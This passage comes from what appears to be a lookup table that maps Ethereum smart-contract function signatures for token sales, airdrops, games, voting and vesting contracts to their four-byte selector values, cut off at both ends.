"claimFromSeveral(uint256,address[])": "0xce8d1910", "refund(uint256,address)": "0x7ad226dc", "deposit(uint256,string)": "0xf1215d25", "createNewSecurityDeposit(string,string,uint256)": "0x8e8b34bc", "SecurityDeposit(address)": "0x87e412f4", "ModiTokenERC20(uint256,string,string)": "0x528d8797", "batchDrop(address[],uint256[])": "0xbe8c1bcc", "BondToken(address,address,address)": "0xc06b0d21", "resetSymbol(string)": "0x31f76043", "LRKToken(uint256,uint256)": "0x69ed8a42", "ETPotatoPresale(address,uint256,uint256)": "0xf48e9c33", "MingToken()": "0x59d4447a", "AirdropFan()": "0xcbfd79e2", "Khatamor()": "0x67c3a6d9", "GreenEnergy()": "0x0caf10b2", "tryRoundEnd(uint256)": "0x5c4f4024", "producerStatement(string)": "0x157024b3", "contributorStatement(uint256,string)": "0xf2836e1c", "recall(uint256,string)": "0x38d44ad5", "beginProjectRound(string,uint256,uint256)": "0xb5f72d88", "CrowdServe(address,uint256,uint256)": "0x11776737", "Bitkat()": "0xaf664f3a", "GFCI(uint256,string,uint8,string)": "0x394dfffb", "BtcToken()": "0xf7d9a5ae", "changeSaleEndBlock(uint256)": "0xfb1478e5", "changeSaleStartBlock(uint256)": "0x5d6952d7", "changeAllowTransfer()": "0x739826c5", "changeCreditFundNIMFAAddress(address)": "0x6effb219", "changeTeamNIMFAAddress(address)": "0x6b5a61ac", "changeTeamETHAddress(address)": "0x2fbfc252", "NIMFAToken(address,address,address,address,uint256,uint256)": "0x2e2aad44", "CentraAsiaWhiteList()": "0x399e7195", "failUserRefund(uint256[])": "0xa3a1d015", "_setGameOver()": "0xcc896494", "_getMaxPooling()": "0x2cdba70e", "_seekOdd(uint256,uint256)": "0x3bd10bf1", "SoccerBet(string)": "0x5bd479ac", "checkFreezeValue(uint256)": "0x91fea350", "IPXToken()": "0xb3908dc1", "IPXTokenBase()": "0xf007557f", "MYYG()": "0x9fda3675", "setMinBalance()": "0xf22f264d", "GPN(uint256,string,string,address)": "0x9c1d8fa2", "TheHumanFund(uint256,string,uint8,string)": "0x3d438c1e", "Arexium(uint256,string,uint8,string)": "0x0c6a5be4", "Mmcchain(uint256,string,string)": "0xab8e0f6e", "getMemberLength()": "0xd965ea00", "changeLifetime(uint256)": "0x824989c3", "Concept(address[],uint256[],uint256,bytes,address)": "0x80956021", "getUserAccount(bytes32)": "0x7d19ec9d", "getUserId(address)": "0x2b956ff7", "unlockTip(bytes32)": "0x3d9277f0", "lockTip(bytes32)": "0xee533a4d", "tipLockCheck(bytes32)": "0x09a0307d", "unlockAccount(bytes32)": "0x129bc044", "userAddressCheck(bytes32)": "0x59b4993c", "lockAccount(bytes32)": "0x10619300", "accountLockCheck(bytes32)": "0x78bcd39a", "setUserAccount(bytes32,address)": "0x17d8405a", "userCheck(bytes32)": "0x11dd576d", "addUser(bytes32)": "0x8faf850d", "getBotContract()": "0x0f8b70c9", "getConfig()": "0xc3f909d4", "DigixbotUsers(address)": "0xecef0e54", "exile(uint8,uint8,uint8,bytes4)": "0x68efb367", "getAddr(uint256)": "0xd81f84b7", "getCanvSize()": "0x986b3a9a", "Fragment()": "0x5fe16454", "Exile()": "0xdec5cf53", "doPayment(uint256,uint256,address)": "0xbdeb130c", "setSubsidy(uint256)": "0x0e9b6281", "getShareIndex(address)": "0x0f136527", "verifyClaim(bytes,uint256,uint256,uint256[],uint256[],uint256[],uint256[])": "0x35ffbe74", "verifyExtraData(bytes32,bytes32,uint256)": "0xa442d820", "getEpochData(uint256)": "0x859e7d32", "setEpochData(uint128[],uint64[],uint64[],uint256[])": "0xf2cfe267", "submitClaim(uint256,uint256,uint256,uint256,uint256)": "0xe7dac983", "getClaimSeed(address)": "0x7087ed2c", "getMinerId(address)": "0xe2dea715", "canRegister(address)": "0x320d46d4", "to62Encoding(uint256,uint256)": "0xff5d2c39", "declareNewerVersion()": "0xe3d86998", "TestPool(address[3])": "0x056ab62a", "Agt()": "0xde72a01d", "getItem(bytes,uint256)": "0x80519ac7", "testItem(bytes)": "0xd572056e", "testToBool(bytes)": "0xc91813ca", "testToByte(bytes)": "0x61cd5683", "testToAddress(bytes)": "0xf8f1f151", "testToBytes32(bytes)": "0xa49886ce", "testToInt(bytes)": "0x7b816719", "testToUint(int256,bytes)": "0xdc7df9d8", "testToData(bytes)": "0xe95bd5f2", "testSubItem(bytes,uint256)": "0x564ad142", "testItems(bytes)": "0x7b053195", "testIsEmpty(bytes)": "0x6f826a7d", "testIsNull(bytes)": "0xe59b0e14", "testIsData(bytes)": "0x024a56a4", "testIsList(bytes)": "0x04455e95", "testFirst(bytes)": "0xb66e68f2", "testItemStrict(bytes)": "0x95e77a05", "RLPReaderTest()": "0x68700891", "_itemLength(uint256)": "0x1ff5e17c", "hashimoto(bytes32,bytes8,uint256,uint256[],uint256[],uint256,uint256)": "0x58e69c5a", "reverseBytes(uint256)": "0x4deaad5f", "computeS(uint256,uint256)": "0x85e1684c", "computeLeaf(uint256[],uint256)": "0x275ccb13", "computeSha3(uint256[16],uint256[8])": "0xea135eeb", "toBE(uint256)": "0xe422f699", "computeCacheRoot(uint256,uint256,uint256[],uint256[],uint256)": "0x3aa4868a", "fnv(uint256,uint256)": "0x48f8fe69", "Ethash()": "0x29c78e0b", "sponge(uint256[9])": "0xb2df8456", "keccak_f(uint256[25])": "0xd7533595", "SHA3_512()": "0x5d49719d", "CampaignRules(address)": "0x0616558c", "Timed(uint256,uint256,uint8)": "0x6dc34462", "isTimeExpired()": "0x8c7d58aa", "isInTime()": "0x58226a76", "create(string,string,uint8,address,string,address)": "0xa4ce8683", "getDefaultClaim(address)": "0xcd56f019", "setDefaultClaim(string)": "0x1eba7c7a", "getClaim(address,string)": "0x58924b81", "setClaim(string,string)": "0x2df3f82a", "set(bytes32,int256)": "0xc92261b5", "datafeed()": "0x2dc47153", "EIP165Implementer()": "0x0379565f", "Subscription(bytes,address,bytes)": "0xe3a8e50b", "newCampaign(address,uint256)": "0xf7572cf3", "removeFromAddresses(address)": "0x535779ef", "getByAddress(address)": "0x30257bf7", "getByIndex(uint256)": "0x2d883a73", "deleteName(address)": "0x2eba1c40", "updateName(address,bytes32)": "0xb162a382", "registerName(bytes32)": "0xd6da0805", "UserAddressRegistry()": "0xa78adf57", "UniversalSchemeMock()": "0xa752c2c5", "SimpleToken()": "0x3d72c71b", "checkGoalReached(uint256)": "0x5b2329d4", "newCampaign(address,uint256,uint256)": "0xdf175e9b", "hello()": "0x19ff1d21", "getChildrenCount()": "0x5e6fc8b4", "getOwnerName(uint8)": "0x29a81222", "getChildContractAddress(uint8)": "0x5a0089d3", "getInfo(uint8)": "0xe4d9de94", "ContractFactory(uint8,uint8)": "0xb0f32e55", "___setTarget(address)": "0x28ea9203", "___proxyTarget()": "0x68832d14", "___setProxyOwner(address)": "0xfbd70768", "___proxyOwner()": "0x09b17085", "___isActive()": "0x076ffa3a", "___coinAddress()": "0x7e45d15c", "___initialize(address,address,address)": "0x4837715a", "CrowdsaleProxy(address)": "0xb62eac16", "transferEthToOnwer()": "0x5807630f", "doAirDrop(address[],address,uint256,uint256)": "0x7ad2a0ce", "addToPayeeBalance(address,uint256)": "0xcbacffe4", "CGToken()": "0x1d25a5eb", "ProtoTrailToken()": "0xee65eec2", "HelloCoin(uint256,string,uint8,string)": "0x2ce1ec67", "addOffChainRaisedContribution(address,uint256,uint256)": "0xa2b038b3", "BurnToken(address)": "0x27029e83", "TokenTransferTo(address,uint256)": "0x143c6d4f", "TokenTransferFrom(address,address,uint256)": "0xc143a372", "TokenGameTransfer(address,uint256)": "0x800a320a", "calculateIcoBonus(uint256,uint256,uint256)": "0x7e5fc6f4", "calculatePreBonus(uint256)": "0x4f96cddd", "calculateIcoTokenAmount(uint256)": "0x61f37dff", "calculatePreTokenAmount(uint256)": "0x05f43bba", "startIco(uint256,uint256,uint256)": "0x10288c4b", "stopPreIoc()": "0xd2de9989", "startPreIco(uint256,uint256,uint256)": "0xc99842f9", "AOG(address,address,address,address,address,address,address)": "0xfa5f2d80", "Electrominer()": "0x8646fb43", "weiBalance()": "0x2969d202", "disableContract(bool)": "0xb5e11819", "Founders()": "0x27aedd10", "SCCAIToken(address,address)": "0xfa003b2e", "transferToken(uint256)": "0x9fc71b31", "transferLockedBalance(address)": "0x5319418a", "transferApprovedBalance(address)": "0x0b803b6b", "autoTransferLocked(uint256,uint256)": "0x966704c2", "autoTransferApproved(uint256,uint256)": "0xc1ee3375", "massApproval(bool,uint256,uint256)": "0x14bd8acd", "changeApproval(address,bool)": "0xb26c9779", "currentCapLevel()": "0x70747544", "currentRateLevel()": "0x75b3f9f5", "currentBonusLevel()": "0xd2c936ff", "checkUnsold()": "0x2faf9a93", "getUnsold()": "0x63a3c452", "goNextRound()": "0xba8118b1", "hasNotEnded()": "0xfab67bb6", "_changeApproveDate(uint256)": "0x514a48ae", "_changeLockDate(uint256)": "0x7690ed70", "_withdrawWei(uint256)": "0xa309800c", "_withdrawAllFunds()": "0xaa6d5dce", "_getTokensAmount(uint256,uint256)": "0xf652076b", "_calculateExcessTokens(uint256,uint256)": "0x3cc15011", "_calculateExcessBonus(uint256,uint256)": "0xa2a5243c", "_getBonusAmount(uint256,uint256)": "0x3ae25075", "_preAllocateTokens(address,uint256)": "0xc155cfde", "_lockTokens(address,uint256)": "0xa34fc5ac", "setNewRatesBase(uint256)": "0xfa69ede9", "setNewRatesCustom(uint256,uint256,uint256,uint256,uint256,uint256)": "0x2033de43", "setNewRateLevel(uint256,uint256)": "0x83979803", "setNewBonusLevel(uint256,uint256)": "0xd782cc54", "PupToken()": "0xf56589d5", "registerForRaffle3()": "0x841b4cd8", "registerForRaffle2()": "0x403a8f53", "registerForRaffle()": "0x9e126449", "setRaffleLimit(uint256)": "0xd13f092e", "drawRaffle(uint256)": "0x856a89fd", "getRaffleStats()": "0x10beb070", "isInRaffle(address,address)": "0x600d0beb", "allOf(address)": "0x5f4784a5", "upgradePackageCountOf(address)": "0x18e124e4", "carsOf(address)": "0xc1ae36d0", "carOfByIndex(address,uint256)": "0x2b99f359", "carCountOf(address)": "0x51593759", "updateAppreciationStep()": "0xcad987f5", "alreadyContains(uint256[],uint256,uint256)": "0xab32775c", "generateCarId(uint256)": "0x45102ca7", "fillRandomCars(uint256[],uint256)": "0xa17fa5f2", "calculatePrice(uint256,bool)": "0x5fe3854e", "giftCar(address,uint256,bool)": "0xfafb3c7a", "purchaseCars(uint256,uint256,bool)": "0xcab7e3d9", "RacingClubPresale()": "0x80dbb7d2", "TioToken()": "0x95b3c92f", "shares()": "0x03314efa", "withdrawGNO()": "0x162d563d", "lockGNO(uint256)": "0xb6ba600a", "TokenGNO(uint256)": "0xb5674c68", "PERKToken()": "0x8f0816bc", "buyPlatinum(uint256,uint256,uint8,bytes32,bytes32)": "0xd8e3c1c8", "buyGold(uint256,uint256,uint8,bytes32,bytes32)": "0xfea78df4", "buySilver(uint256,uint256,uint8,bytes32,bytes32)": "0x86c6f66b", "buyBronze(uint256,uint256,uint8,bytes32,bytes32)": "0xc9c51578", "buyCopper(uint256,uint256,uint8,bytes32,bytes32)": "0x29edd574", "setXPERContractAddress(address)": "0xb6d1fbf9", "setSKLContractAddress(address)": "0xde648b87", "setTPTContractAddress(address)": "0x87fc00f7", "setNDCContractAddress(address)": "0x4711748d", "StarterKit(address,address,address,address,address)": "0x09cf0329", "backupfarmSingle(address,address,uint256)": "0xf939499d", "backupfarmItems(address[],uint256[])": "0xe3ac3880", "farmSingle(address,address,uint256)": "0x1084bc90", "EstLiquidationCap()": "0x8b4c4307", "setMaxPerExchange(uint256)": "0xacac0b9f", "fixedExpUnsafe(uint256)": "0xa72dc52e", "fixedExp(uint256)": "0xb7bc7cb8", "fixedLog2(uint256)": "0x2226549e", "fixedLoge(uint256)": "0x2822f62d", "calculateSaleReturn(uint256,uint256,uint16,uint256)": "0xd39cce1c", "calculatePurchaseReturn(uint256,uint256,uint16,uint256)": "0xa78e887c", "removeService(address,address)": "0x8ea8e149", "grantService(address,address)": "0x726df9cc", "checkAuthorization(address,address)": "0x685c234a", "deauthorizeProvider(address)": "0x673b57e9", "authorizeProvider(address)": "0x112ea262", "settleSeller(address,uint256)": "0x64da8ad3", "settleBuyer(address,uint256)": "0x54b8dfcb", "checkServiceFee(address)": "0x6c9c1d41", "setServiceFee(address,uint256)": "0xef2fa169", "setBurnRate(uint256)": "0x189d165e", "tokenGenerationEvent()": "0x98fb0ac5", "wolkGenesis(uint256,uint256,address)": "0x917d2be2", "ProspectorsDevAllocation(address)": "0x69817dd4", "reward(address,address,uint256,uint256,uint256)": "0x5e50f037", "rewardsOf(address)": "0x479ba7ae", "newVitaReward(address)": "0xad009062", "VitaToken()": "0xfd18b484", "advisorVesting(address[],uint256[])": "0x4d7ece70", "teamVesting(address[],uint256[])": "0x6a0e7c24", "PVCToken(address)": "0xb03d5ce8", "TaTaTu()": "0x9f408251", "RefondCoin(uint256,string,string)": "0xcd7e9fa6", "distributePCY(address[],uint256,uint256)": "0xfaaa4d22", "PAYCOINLY()": "0x8b82f4bc", "setBackupOwner(address)": "0x3576a32f", "MassERC20Sender(address)": "0x540ae26f", "upgradeOnePointZeroBalances()": "0xc6cf4dd9", "startAndSetStopTime(uint256)": "0xff6867c0", "reCap(uint256)": "0x0a1f0d9b", "HelloGoldRound1Point5()": "0x26eca77c", "testingOnly()": "0x2b6bbc31", "IDEAL()": "0xbb51de39", "sendToken(address[],uint256)": "0x8bc5f845", "Airdrop()": "0x3f6b6f2e", "resetReclaim()": "0xd8090cbf", "setupReclaim()": "0x0bbad618", "isBanned(address)": "0x97f735d5", "unblacklist(address)": "0x75e3661e", "last10()": "0x15bf2b51", "getWinnerCount()": "0xa46c3637", "getPlayersCount()": "0xa76594bf", "getPayOutAmount()": "0x292c8aaa", "produceRandom(uint256)": "0x7785954b", "stopLottery(bool)": "0x62ba1649", "setPlayValue(uint256)": "0x9ad5be7b", "outputMoney(address,uint256)": "0x89b5ea24", "getBalanceToken()": "0x1425d2fa", "getTradeIsOpen()": "0x66af3914", "setTradeIsOpen(bool)": "0x704b164d", "getPriceOneToken()": "0x244159af", "setPriceOneToken(uint256,uint256)": "0xafb58d18", "getAddressToken()": "0xba7fb1df", "setAddressToken(address,address)": "0xc9511b59", "ReussitexCoin()": "0x583fe287", "emergencyCease()": "0xc6d0be63", "setDAOAndMultiSig(address,address)": "0x412edecd", "allocateTokensInternally(uint256)": "0xc5503e89", "setPricing()": "0xd10adfe3", "Fulcrum()": "0x3100ef7b", "refundToken(address,address,uint256)": "0x932fec40", "setNotice(string)": "0x3cf572a7", "softCap(uint256)": "0x7a366d14", "BMCTToken()": "0x8b3d10bf", "batchFreeze(address[],bool)": "0xae13efe0", "setAllowStart(bool)": "0xe138efb2", "setActiveTimes(uint256[],uint256[])": "0x77300338", "spiceUp(uint256,string)": "0xee4d3c7f", "play(uint256,bool)": "0x12508ea4", "ChronosCore(uint256,uint256,uint256,uint256)": "0xa5cb66c0", "setNextPoolPercentage(uint256)": "0x275cb687", "setFeePercentage(uint256)": "0xae06c1b7", "canStart()": "0xec309038", "ChronosAccessControl()": "0x2c89a84c", "Silver()": "0xfe275280", "Boxicoin()": "0x5c52b434", "OrgonToken()": "0xa29c3574", "calculateEthToChargcoin(uint256)": "0x626263c5", "transferToContributor(address,uint256)": "0x29bcb186", "ChargCoinContract()": "0x8a9b809b", "PacBall()": "0xfc970859", "MakeMyToken(string,string,uint256)": "0x36b641c2", "AirContactToken(uint256,string,uint8,string)": "0xd92c4f7c", "mappings()": "0x563fce0b", "nameOf(address,address)": "0xe95b4aa8", "SimpleSafeToken()": "0x3cb025e2", "UpcToken()": "0x3c3a8c39", "ShrimpFarmer()": "0x0b6f5b3d", "_Crowdsale(address,uint256,uint256,address)": "0x7e2fc2b6", "sellKun(uint256)": "0xe303cccd", "feed100AndPay(uint256)": "0x09a38f26", "feed100(uint256)": "0x763cf9aa", "feed50(uint256)": "0x09beb01b", "getTotalAuthorizedForPayment()": "0x495c5891", "authorizedFundsAvailable()": "0x293c33b5", "transferApprovedFunds()": "0xa9fd3f42", "setTeamContractAddress(address,address)": "0xe6d26bc6", "getTeam(uint32)": "0x8d49cd7f", "tokenIdsForTeam(uint32)": "0x485e82d7", "refunded(uint32)": "0xb6266248", "ownsPlayerTokens(uint32)": "0xef2de6f8", "getPlace(uint32)": "0x94e5b7e6", "getScore(uint32)": "0x863682f4", "scoreTeams(uint32[],int32[],uint32[])": "0x317ebc79", "getTeamOwner(uint32)": "0x9f35910c", "releaseTeam(uint32)": "0x150eb4d9", "updateTeam(address,uint32,uint8[],uint32[])": "0xb3481e61", "createTeam(address,uint32[])": "0x013f83c9", "setContestContractAddress(address,address)": "0xc65b125f", "setLeagueRosterContractAddress(address,address)": "0x679b9935", "setCoreContractAddress(address,address)": "0x064af4ee", "setCLevelAddresses(address,address,address,address)": "0x36e685f5", "setCommissioner(address)": "0x4e0c4a9c", "setProduction()": "0xce88a9ce", "setTransferActive(bool)": "0x74d618cb", "setAddressFundReferal(address)": "0x47ed0112", "setEndTimeIco(uint256)": "0x107e1a29", "setStartTimeIco(uint256)": "0x64e593c0", "setEndTimePreIco(uint256)": "0x1b8e61c7", "setStartTimePreIco(uint256)": "0x3b3fa917", "checkTransfer(address)": "0xa77c1b08", "OurBit()": "0x1fc083cf", "SecurityToken(string,string)": "0x476c9f41", "announcementHash()": "0x1274c3f3", "announcementType()": "0x5fcce279", "announcementURI()": "0xf31294a4", "announcementName()": "0x9ea0c08c", "CheckpointToken(string,string,uint256)": "0x648b3514", "verify(address,address,uint256)": "0xad076994", "money()": "0x4ddd108a", "chart_call()": "0x5a24c6a9", "gaveVote(address)": "0x7badc7af", "getCurrentVotes(uint256)": "0x1b538bcc", "getConsideredTokens()": "0x3bb8a87f", "delegateCount()": "0x3e38a2b7", "delegateVote(address)": "0xb31e1d4d", "undelegateVote()": "0xccf8ef24", "registerAsDelegate(bytes32)": "0x40128db3", "unregisterAsDelegate()": "0x8d4d8e19", "startTokenVotes(address[],uint256,uint256,uint256,address[])": "0xdb93f375", "Exoso()": "0x00d7b3a9", "TokenToken(address)": "0x3bfca20f", "BALL()": "0x4a7759f8", "fus(uint256)": "0xc542675e", "ASIEX()": "0x46054144", "TOL()": "0x5583318a", "deleteTask(bytes32)": "0xe64f15a2", "setTaskRewardPaid(bytes32)": "0xd30bf323", "getTaskRewardAndStatus(bytes32)": "0xb9c105cf", "getTaskReward(bytes32)": "0xa022c15e", "taskRewardVote(bytes32,uint256)": "0x497a7b48", "getNumTasks()": "0x1efe3abf", "taskExists(bytes32)": "0xb7bf356a", "getTaskById(bytes32)": "0xd8f6dcf2", "addTask(bytes32,string)": "0xb7825cfc", "setTasksAddress(address)": "0x253caf94", "approvePullRequest(bytes32)": "0xa01fdbef", "getNumPullRequests()": "0xe71a5577", "getPullRequestById(bytes32)": "0xaf692e00", "addPullRequest(bytes32,bytes32,uint128)": "0x7caf59d9", "EPIToken(address,uint256)": "0x9c2f0067", "CoinWindow(uint256,string,string)": "0x991e47ff", "ID()": "0xb3cea217", "only666()": "0x5137dd99", "take(bytes)": "0xcce91957", "TEFC()": "0xde8bb64f", "report(string)": "0xf616b7b7", "shouldRevertPure(bool)": "0x017fa51d", "shouldRevertWithReturn(bool)": "0x2bf7d279", "shouldRevert(bool)": "0xffae399e", "transferOwnedOwnership(address,address)": "0xa1eb84b0", "renounceOwnedOwnership(address)": "0x003a661d", "QCSCToken()": "0xf0acc83a", "Beebit(bytes32)": "0x75b88b82", "calculatePrizes()": "0x8e7e9a3c", "finish(uint8,uint8,uint8)": "0x7eaa4389", "proposalVotes(uint256)": "0x544ffc9c", "proposalTarget(uint256)": "0x5dc4d8a6", "proposalReason(uint256)": "0x1cbea83d", "proposalData(uint256)": "0x96dea936", "setProposalDuration(uint256)": "0x7d007ac1", "setProposer(address,bool)": "0xe9ed9b64", "propose(bytes,address,string)": "0x38c92ef0", "depositAndVote(uint256,uint256,uint256)": "0x88f34bc2", "Uptrennd()": "0x355d8c64", "getCanShareProfitAccounts()": "0x9715d80e", "preTransfer(address,address,uint256)": "0xbf1152db", "transferToPartnerAccount(address,uint256)": "0xa145492a", "setMintAndBurnOwner(address)": "0x2f434748", "SuperConductToken()": "0xdce9f6c3", "CryptoX(uint256,uint256)": "0xa951fad2", "Ankr()": "0x919f31c2", "spenderDecreaseApproval(address,uint256)": "0x1dc45c6d", "Dil()": "0xa142040b", "refundBalances(address[])": "0xd0995b33", "setArrayLimit(uint256)": "0xee8a0a30", "setRequiredStake(uint256)": "0xaf9cb9f6", "requiredStake()": "0x19cb355d", "totalStaked()": "0x817b1cd2", "unstake(address)": "0xf2888dbb", "stake(address,address)": "0x808615ac", "hasStake(address,address)": "0x28c69eb2", "DigitalMoney(uint256,string,string)": "0x02e650b6", "LLV_311_EDIT_1()": "0xed0b1cb3", "calculateTokensAmountToSale(uint256,uint256)": "0x3957f093", "takeDividends(address)": "0xe19aca85", "tokensAmountFrom(uint256)": "0xad7222c1", "priceWithDiscount(uint256,uint256)": "0x2dde7241", "priceFor(uint256)": "0x8d5555f2", "calculateTokensFrom(uint256,uint256)": "0x14325458", "getDividendAmount(address,address)": "0x3b0f343b", "mintPresale(uint256,address)": "0xe36d036c", "setTokenDiscountThreshold(uint256)": "0x3b92015e", "ChangeCoinCrowdsale()": "0x7f293e02", "getDAdmin(bytes32)": "0x302a7ff3", "setDAdmin(bytes32,address)": "0xdfd4715e", "getCommunityBallotWeiPrice()": "0x5f8bad42", "getCommunityBallotCentsPrice()": "0x0f5e7348", "dInit(address)": "0x0ed15d23", "emergencySetDAdmin(bytes32,address)": "0xb7935f0a", "emergencySetBBFarm(uint8,address)": "0xc416a0d7", "emergencySetABackend(bytes32,address)": "0x47d8fcb3", "PurgeCoin()": "0xbee5ea6d", "preICO()": "0x68a6e74b", "getContractBalance(address,address)": "0x6a8ae136", "getVestingBalance(address,address,address)": "0x1c20be7e", "sendTokenReleasedToBalanceInternal(address,address,address)": "0x3cb5d170", "releaseGrant(address,address,bool)": "0x73582884", "revokeVesting(address,address)": "0x3613b781", "createVesting(address,address,uint256,uint64,uint64,uint64)": "0x0ac10c0d", "CubaazCoin()": "0x62581b79", "UKW()": "0xa152b23e", "admin(string,string,string,string)": "0xe3a0de36", "setGlobalTimeVault(uint256)": "0x4e7ec0e4", "upgradeToken(address)": "0x6ee31a18", "checkTransferRequirements(address,uint256)": "0xa887d816", "GayBananaToken()": "0x9fae8fd8", "Dsteem()": "0x64dfe85e", "CTADevilleToken()": "0x62228c17", "canTransferTokens()": "0x7177a7dd", "isException(address)": "0x98636f32", "delFrException(address)": "0xe563d541", "addToException(address)": "0x27b5985b", "setMinGas4Accts(uint256)": "0xa9aae07a", "setGas4Token(uint256)": "0xcb381c3c", "setToken4Gas(uint256)": "0x2f2ebe41", "FTXToken()": "0x919b30cf", "cei(uint256,uint256)": "0x748ffa5b", "BitcoinToken()": "0x44b81a77", "PIP()": "0xd632fd1d", "withdrawPartial(uint256)": "0x1211540c", "buyStarInitial(uint256,string)": "0xa745953e", "getStar(uint256,string,string)": "0xe8179abf", "setTransferPrice(uint256)": "0x10388809", "setStarInitialPrice(uint256)": "0xebcd8d8a", "setMinMax(uint256,uint256)": "0xa681f950", "setMasterName(uint256,string)": "0x99f6a693", "setGivenName(uint256,string)": "0xfb486c7b", "reserveStarsForOwner(uint256)": "0xcd1e484b", "CryptoStars()": "0x16c0acde", "BMICoin(address,address)": "0xc89550a8", "ShiversToken(uint256,string,uint8,string)": "0xea46336b", "Beth()": "0x78ec6dbd", "EOSRegistration(string)": "0x5293f22f", "getOptionPair(address,uint256,address,uint256,uint256)": "0x9f839d22", "testIsOptionPairRegistered(address,uint256,address,uint256,uint256)": "0x86cc5a1d", "getOptionAddress(address,uint256,address,uint256,uint256,bool)": "0x0e9fb0ed", "testValidateTrade(address,address,address)": "0x899c4434", "testCanTrade(address,address)": "0x2726403a", "testCanDeposit(address)": "0xec4b48ad", "testRemoteWithdraw(uint256,uint256,uint256,uint256,address,address,uint8,bytes32,bytes32,address)": "0x2d957790", "getUserFee(address)": "0x060f58c3", "sweepTokenAmount(address,uint256)": "0xe28deda5", "depositTokenToUser(address,address,uint256)": "0x193ccc20", "depositToUser(address)": "0xa4c1e9c0", "tokenRestriction(address,bool)": "0xa7cb6edc", "updateOptionsRegistryAddress(address)": "0xbd499af3", "updateComplianceAddress(address)": "0x58294575", "changeUserClass(address,uint256)": "0x0c3257d0", "changeClassFee(uint256,uint256)": "0x1fd2e006", "changeSweepAccount(address)": "0xfd28392a", "changeNewExchange(address)": "0x5ea98520", "UberDelta()": "0x50bd1933", "isOptionPairRegistered(address,uint256,address,uint256,uint256)": "0x3a88594d", "registerOptionPair(address,uint256,address,uint256,uint256)": "0xec0da0cd", "validateTrade(address,address,address)": "0x014b0732", "canTrade(address,address)": "0x657157e5", "canDeposit(address)": "0x4bf0d331", "changeHelper(address,bool)": "0xd9d210b8", "Helper()": "0x42b4ef95", "newManager(address)": "0x906e9400", "OwnerManager()": "0xe7daaa5a", "requestRedeem(uint256)": "0xaa2f892d", "_getNewFloorGene(uint256)": "0x3e764fdb", "_getChallengeSuccess(uint256,uint256,uint256)": "0xca88c5bd", "_challengePart2(uint256,uint256,uint256)": "0xa7819ad7", "_computeCooldownRemainingTime(uint256)": "0xe6b950f3", "_transport(uint256,uint256)": "0x6ed89fbc", "recruitHero()": "0x8cf5dbc6", "_setTempHeroPower()": "0x404fdfdf", "setConsolationRewardsPercent(uint256)": "0xd10ceb47", "setConsolationRewardsClaimPercent(uint256)": "0x780e4b96", "setConsolationRewardsRequiredFaith(uint256)": "0x4f33428a", "setNoviceDungeonId(uint256)": "0xc89fcf58", "setRecruitHeroFee(uint256)": "0x0b93bf0d", "setTrainingFormulaContract(address)": "0x18ba6973", "setChallengeFormulaContract(address)": "0xe03cca4d", "setTempHeroPower()": "0x445d9936", "calculateResult(uint256,uint256,uint256)": "0xebe7e852", "calculateResult(uint256,uint256)": "0x532af7d2", "addDungeonNewFloor(uint256,uint256,uint256)": "0x0b4964a8", "addDungeonRewards(uint256,uint256)": "0xa64f829a", "setDungeonStatus(uint256,uint256)": "0x135bada6", "createDungeon(uint256,uint256,uint256,uint256,uint256,address)": "0xf5d09857", "WebsiteHostingToken()": "0x6655ff3d", "setPricingStrategy(uint256,uint256,uint256,uint256,uint256,uint256)": "0xfd6358ce", "teamPrizeClaim(uint256)": "0x3ac3a2fe", "playerPrizeClaim()": "0x14287a07", "getReportedMatches()": "0x09508ce4", "getMatchReport(uint256)": "0x7d3fcaff", "getUnReportedMatches()": "0xd002a41c", "getInPlayGames()": "0x48cd65d9", "getFixtures()": "0x37ceb05b", "getMatchAwayPlayers(uint256)": "0x53d838b6", "getMatchHomePlayers(uint256)": "0x92ff3751", "joinMatch(uint256,uint256,string)": "0x0d9d19b9", "createPlayerMatch(uint256,uint256,uint256,uint256,uint256)": "0xedc0aee6", "getEntryPrice()": "0x9a14228e", "getTeamOwner(uint256)": "0x0c8135a7", "getCryptoCupTokenContractAddress()": "0x889d9550", "getTotalMatches()": "0xb7e2263b", "developerPrizeClaim()": "0xfb01f4b1", "halveEntryPrice()": "0xfe49dd5f", "doubleEntryPrice()": "0x2436219c", "toggleDataViewWindow(uint256)": "0x70a4fc11", "toggleMatchStartEnd(uint256,uint256)": "0x13a927c7", "toggleInPlayJoining()": "0xf572ae2e", "togglePublicMatches()": "0x6ea11f65", "setCryptoCupTokenContractAddress(address)": "0x08707031", "_isMember()": "0x65facff0", "_newPresserFee(uint256)": "0x6633a2bb", "isMember()": "0xd02982cf", "newPresserFee()": "0x079aab88", "Button(uint64,uint64,uint64,uint64,uint64,address)": "0xd4aa6b59", "manualEtherWithdraw()": "0xd4524c72", "startSale(uint256,uint256,uint256)": "0x04d742dc", "HuoNiu()": "0xe2996879", "PublicSale(address,address,uint256,uint256,uint256)": "0x930c57f3", "transferWithBonus(address,uint256)": "0xac51af8e", "setBtcEthRate(uint256)": "0xb7a7612c", "Eticket4Sale(address,address,uint256,uint256,uint256)": "0x0bcef54c", "PeriodSale(uint256,uint256)": "0x2c174073", "onPurchase(address,address,uint256,uint256,uint256)": "0x7d48dcd7", "CappedSale(uint256)": "0x5b8bcb53", "BuyItem(uint256,string)": "0x98ef5bf9", "Payout(uint256)": "0x22427047", "AddItem(uint32,uint16,uint256,uint16,uint16,string)": "0xf31df3f8", "ChangeItemPrice(uint256)": "0xaf28059d", "ChangeFee(uint16)": "0x650d0aa3", "ItemMarket()": "0x0a7a8c0a", "TV()": "0x5240346d", "GENEOSSale(uint256)": "0xa33bea16", "SOPHIYA()": "0x9f6e3456", "BuToken()": "0xd7dcaa19", "mintvestedTokens(address,uint256)": "0x56a807d9", "mintAndAllocateZCO(address,uint256)": "0x77e75b07", "mintLeftOverZCOToWallet()": "0x15a6a11c", "removeFromPreSaleRefunds(address,uint256)": "0x42279e82", "addToPreSaleRefunds(address,uint256)": "0x0f8eaa74", "viewPreSaleRefundsInMainSale(address)": "0x477d47b5", "removeFromKYCList(address)": "0x836a107f", "addToKYCList(address)": "0xbea51f81", "viewKYCAccepted(address)": "0x3a8d6e5e", "removeFromGoldList(address)": "0x0d301c75", "addToGoldList(address)": "0xf469707f", "viewGoldList(address)": "0x0eb05d49", "ZebiMainCrowdsale(uint256,uint256,uint256,address,uint256,uint256,address,address,address,uint256,uint256,uint256,uint256,int256,uint256)": "0x87ae00a3", "viewPreSaleRefunds(address)": "0x22eb2c02", "viewPreSaleCancelledList(address)": "0xe67bcfb6", "viewNoncsallocations(address)": "0xd075c11c", "revertNoncsallocation(address)": "0xe955ee03", "allocatenonCSTokens(address,uint256)": 